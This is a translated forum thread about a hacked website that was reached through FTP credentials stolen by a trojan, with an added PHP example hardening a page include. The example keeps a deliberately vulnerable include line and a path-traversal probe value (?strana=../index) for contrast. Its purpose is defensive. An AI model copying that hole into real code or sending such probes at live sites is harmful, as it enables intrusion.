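Files that match only the decoder pattern, or whose block has no closing comment, are reported and left alone on purpose. Cleaning removes the symptom only: as the thread later establishes, the attacker came in through stolen FTP credentials, so the passwords have to be changed and the infected client machine cleaned before the directory is restored, otherwise the script comes straight back.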
-
Re: Our website got hacked
Quote:
Originally posted by
bless
Well, apart from that, there's a popup window on every page for PENIS enlargement - or something like that, or else a link to a casino. And I don't remember putting that there :)
specifically, this is what he inserted:
...
I looked at it ... honestly I'm not too sure how they pulled that injection off ... unless the whole server is hacked ...
-
Re: Our website got hacked
It's also quite interesting that neither the other subdomains nor the main domain were damaged, but I hope it isn't just a matter of time.
-
Re: Our website got hacked
Quote:
Originally posted by
Fox!MURDER
I looked at it ... honestly I'm not too sure how they pulled that injection off ... unless the whole server is hacked ...
I looked at it too and I don't get it?? you can't insert anything into it, an apostrophe etc., and you can't feed it a file from another site either...
edit: So right now I'm in a situation where I have no idea how to defend myself :-/ To be safe I've cancelled all the FTP logins, but I really don't know. I'll also add the protection with that switch, but otherwise nothing else comes to mind :-(. I hope it helps.
-
Re: Our website got hacked
Quote:
Originally posted by
bless
I looked at it too and I don't get it?? you can't insert anything into it, an apostrophe etc., and you can't feed it a file from another site either...
edit: So right now I'm in a situation where I have no idea how to defend myself :-/ To be safe I've cancelled all the FTP logins, but I really don't know. I'll also add the protection with that switch, but otherwise nothing else comes to mind :-(. I hope it helps.
do you have logs?
-
Re: Our website got hacked
Quote:
Originally posted by
Fox!MURDER
do you have logs?
I think so: www.log.velvary.com
well, looking at them, they're probably useless - given that one of them is from 2005 and the other only from 2007 :-/
-
Re: Our website got hacked
Problem solved
Quote:
Originally posted by HOSTING SUPPORT
You're right, the attacker got onto your subdomain via FTP; apparently you
didn't have a strong enough password set. So do you want us to restore the whole pages directory?
:-( oh well...
-
Re: Our website got hacked
To give an idea, I'll also throw in a link to a nice recent article.
XSS (Cross-Site Scripting) hacking @ security-portal.cz
-
Re: Our website got hacked
Quote:
Originally posted by
Fox!MURDER
yep, smart cookie :-)
basically all it takes is to abuse that injection properly, or to find another similar bug ...
the simplest fix for this problem is to write a simple switch
PHP code:
// every page is listed explicitly; any other value of $strana hits default
switch($strana)
{
    case 'jednastranka':
        include('jednastranka.php'); break;
    case 'druhastranka':
        include('druhastranka.php'); break;   // closing quote was missing in the post
    default:
        die("WTF?");
}
Instead of this I use:
PHP code:
$allowed = array('nieco1', 'nieco2', 'nieco3');
if (!in_array($co, $allowed, true))   // strict comparison: only an exact string match passes
    $co = 'nieco1';                   // anything else falls back to the default page
and then
PHP code:
readfile('texts/'.$co.'.html');
or
PHP code:
include_once('inc/'.$co.'.php');
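The recursive include traced earlier in the thread (./pages/../index.php) and the two fixes proposed here (the switch and the in_array allowlist) put together as one complete page dispatcher. This is an added example, not code from the thread or from the sdh.velvary.com site; the page names uvod, clenove and kontakt and the pages/ layout are assumed. It keeps the original vulnerable line next to the hardened version and adds a second check that the resolved file really lies inside pages/, which catches mistakes in the allowlist itself (for example an entry containing a slash or a symlink pointing elsewhere).

```php
<?php
declare(strict_types=1);

// Added example, not the site's original code. Assumed layout:
//   index.php  (this file)
//   pages/uvod.php, pages/clenove.php, pages/kontakt.php
// Request: index.php?strana=uvod

const PAGES_DIR     = __DIR__ . '/pages';
const DEFAULT_PAGE  = 'uvod';
const ALLOWED_PAGES = ['uvod', 'clenove', 'kontakt'];   // assumed page names

// VULNERABLE (the line from the thread). $strana comes straight from the request,
// so ?strana=../index turns the path into ./pages/../index.php and the script
// includes itself until PHP runs out of memory or stack. Shown for contrast only.
function include_page_vulnerable(string $strana): void
{
    include("./pages/" . $strana . ".php");
}

// HARDENED. Returns the absolute path of the page to include, or null if the
// request must be rejected. Nothing from the request reaches the filesystem
// unless it is an exact member of ALLOWED_PAGES.
function resolve_page(string $strana): ?string
{
    // 1. Allowlist with strict comparison: "../index", "uvod/../../x",
    //    "uvod\0" and "0" are all rejected because none of them is exactly "uvod".
    if (!in_array($strana, ALLOWED_PAGES, true)) {
        return null;
    }

    // 2. Containment check: realpath() collapses any ".." and resolves symlinks,
    //    so even a bad allowlist entry cannot point outside pages/.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $strana . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$strana = $_GET['strana'] ?? DEFAULT_PAGE;
if (!is_string($strana)) {
    $strana = '';               // ?strana[]=x arrives as an array; treat as unknown
}

$page = resolve_page($strana);
if ($page === null) {
    // Unknown page: answer 404 instead of silently showing the default page,
    // so probes such as ?strana=../index stand out in the access log as 404s.
    http_response_code(404);
    exit('Unknown page');
}
include $page;
```

Whether to fall back to the default page (as in the in_array post) or to refuse the request (as die("WTF?") does in the switch) is a design choice; refusing is preferable because every probe then leaves a distinct 404 in the log, which is exactly what was missing when the thread tried to work out how the attacker got in.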
-
Re: Our website got hacked
Explanation of how they got hold of the password:
My girlfriend has a login (the very one in question), so we found out that it was obtained from her computer. However, she wasn't aware of having been anywhere dodgy or having caught any spyware. Until suddenly a little trojan horse was discovered :-), which she caught from her brother, whose website they also got into a long time ago. And then, as the icing on the cake, a little script got put on the website...
Well, and this script sends off the file in which the FTP credentials from Total Commander are stored.
-
Re: Our website got hacked
So, the classic - the biggest security problem of Linux (and Unix) servers is the Windows machines that many people connect to them from.
-
Re: Our website got hacked
Quote:
Originally posted by
Rainbow
So, the classic - the biggest security problem of Linux (and Unix) servers is the Windows machines that many people connect to them from.
yep, that's why I'd rather laboriously type out all the passwords I have under XP (except for the putty/winscp pgp keys)...
-
Re: Our website got hacked
Quote:
Originally posted by
PiT
yep, that's why I'd rather laboriously type out all the passwords I have under XP (except for the putty/winscp pgp keys)...
Imho that won't help you much; a keylogger is enough and we're back where we started. The point is that something gets onto your machine.
-
Re: Our website got hacked
It's a bit safer, because you only need to make sure that no keylogger is running at the moment you type in the password. With passwords stored in some INI files, it's enough for some program to run for a moment and upload it somewhere. The absolutely ideal solution is to keep it on a shared drive :D
-
Re: Our website got hacked
Well, it's mainly about the users, not the platform; for example the Total Commander mentioned here warns emphatically that passwords are stored only in plaintext and that this isn't secure.
-
Re: Our website got hacked
Imho Rainbow rather meant that there aren't many trojans under the penguin (after all, it's software too :p)
Otherwise it really is only and solely about the users and the security of the software they use; that Total Commander stores passwords in plaintext is known to everyone who has ever used it for FTP, exactly as Peca-on-line writes
-
Re: Our website got hacked
Quote:
Originally posted by
Peca-on-line
Well, it's mainly about the users, not the platform; for example the Total Commander mentioned here warns emphatically that passwords are stored only in plaintext and that this isn't secure.
Yeah, I completely agree with that - it usually falls apart because of the user anyway...
Quote:
Originally posted by
Caleb
Imho Rainbow rather meant that there aren't many trojans under the penguin (after all, it's software too :p)
Otherwise it really is only and solely about the users and the security of the software they use; that Total Commander stores passwords in plaintext is known to everyone who has ever used it for FTP, exactly as Peca-on-line writes
Well, I dare say that if Linux were widespread among "normal" :-) users, the trojans would be there too... But for now that's not the case.
BTW it was a very successful attack :-). Not only did it hit our website; as a bonus, also the FTP to the school. My girlfriend's dad's FTP to work + God knows what it did with what he has on his computer...(he definitely didn't sound happy :-) ), now they can pray... All in all, 4 computers in the household infected :-) I'd had it on the website since 22 March and nobody noticed, so the trojan was happily sending stuff out and everybody was happy, so God knows how long it had been collecting information at their place. The interesting thing is that I noticed it completely by accident :-)
-
Re: Our website got hacked
If Linux were widespread, that wouldn't mean any trojans ...
Already thanks to the design of that system ...
BTW, why was that FTP accessible from anywhere??? That alone is dangerous even if you have a strong password ...
-
Re: Our website got hacked
Quote:
Originally posted by
svaca
If Linux were widespread, that wouldn't mean any trojans ...
Already thanks to the design of that system ...
BTW, why was that FTP accessible from anywhere??? That alone is dangerous even if you have a strong password ...
Well, that's quite simple - the settings of my webhosting don't allow me to do that.
-
Re: Hacknutí našich webovek
-
Re: Our website got hacked